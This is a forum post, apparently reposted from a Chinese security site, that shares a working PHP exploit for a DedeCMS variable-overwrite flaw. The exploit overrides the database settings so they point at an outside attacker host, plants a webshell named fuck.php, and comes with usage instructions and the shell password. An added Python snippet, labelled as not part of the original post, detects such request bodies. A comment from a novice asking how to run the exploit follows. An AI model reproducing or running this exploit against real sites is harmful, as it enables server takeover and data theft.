An exp for the dedecms variable-overwrite 0day getshell


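    An exp for the dedecms variable-overwrite 0day getshell (an exp from a while back that works well, posted here just to share). By: 黑小子.

    This dede hole was disclosed a while back, but this exp is still quite practical, heh!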

Exp:

#!usr/bin/php -w
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:


);
echo "rn";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "[*] Exploit Success n";
if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.phpn" ;

if($aid==2)echo "[*] Shell:".$url."/$path/fuck.phpn" ;

if($aid==3)echo "[*] Shell:".$url."/$path/plus/fuck.phpn";

}else{
echo "[*] Exploit Failed n";
}

function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1rn";
$data .= "Host: ".$host."rn";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1rn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Accept-Language: zh-cn,zh;q=0.5rn";
//$data .= "Accept-Encoding: gzip,deflatern";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn";
$data .= "Connection: keep-alivern";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Content-Length: ".strlen($content)."rnrn";
$data .= $content."rn";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*]  No response from ".$host."n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}

?>

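Set up a PHP environment and run dede.php from cmd:

php dede.php lcx.cc 1 vul

The first argument is the site, the second is the ID, the third is the path.

The one-liner password is fuck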
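For defenders, the POST body in the exp above is recognisable by parameter names rooted in a PHP superglobal (`_COOKIE[GLOBALS][cfg_db...]`). The following check flags such keys in a form-encoded request body; it is an added example, not part of the original post, and the sample bodies, function names and reason labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# PHP superglobal names; a request parameter should never be named after one.
SUPERGLOBALS = {"GLOBALS", "_GET", "_POST", "_COOKIE", "_REQUEST",
                "_SERVER", "_FILES", "_ENV", "_SESSION"}
# DedeCMS database settings, named as in the request body shown on this page.
DB_CFG = re.compile(r"^cfg_db\w+$")


def key_path(name):
    """Split a PHP-style parameter name 'a[b][c]' into ['a', 'b', 'c']."""
    head, bracket, rest = name.partition("[")
    return [head] + (re.findall(r"\[([^\]]*)\]", bracket + rest) if bracket else [])


def inspect_body(body):
    """Return (parameter name, reason) for every key rooted in a superglobal."""
    findings = []
    # latin-1 keeps non-UTF-8 bytes (e.g. GB2312 form values) from being mangled.
    for name, _value in parse_qsl(body, keep_blank_values=True, encoding="latin-1"):
        path = key_path(name)
        if path[0] not in SUPERGLOBALS:
            continue
        overrides_db = any(DB_CFG.match(p) for p in path[1:])
        findings.append((name, "db-config-override" if overrides_db else "superglobal-key"))
    return findings


# Constructed samples: the first mirrors the shape of the body above, with a
# documentation-range address and dummy values in place of the page's own.
SAMPLE_ATTACK = ("doaction=x&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=192.0.2.10"
                 "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=u"
                 "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true")
SAMPLE_BENIGN = "keyword=dede&typeid=1&_cookie_hint=1"
SAMPLE_OTHER = "_SESSION%5Badmin%5D=1"

if __name__ == "__main__":
    for label, body in (("attack-shaped", SAMPLE_ATTACK),
                        ("benign", SAMPLE_BENIGN),
                        ("other superglobal", SAMPLE_OTHER)):
        print(label, inspect_body(body))
```

The same test can run in a WAF rule or a log pipeline that records request bodies; any hit on `/plus/mytag_js.php` is worth reviewing.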

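Comments (old system):

Anonymous @ 2013-03-11 23:05:53

Boss, please explain. I'm new to PHP, how do I run this... I've set up the PHP environment... I just don't know how to run it

Site reply:

The instructions are already given in the article.

Article source: lcx.cc: An exp for the dedecms variable-overwrite 0day getshell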
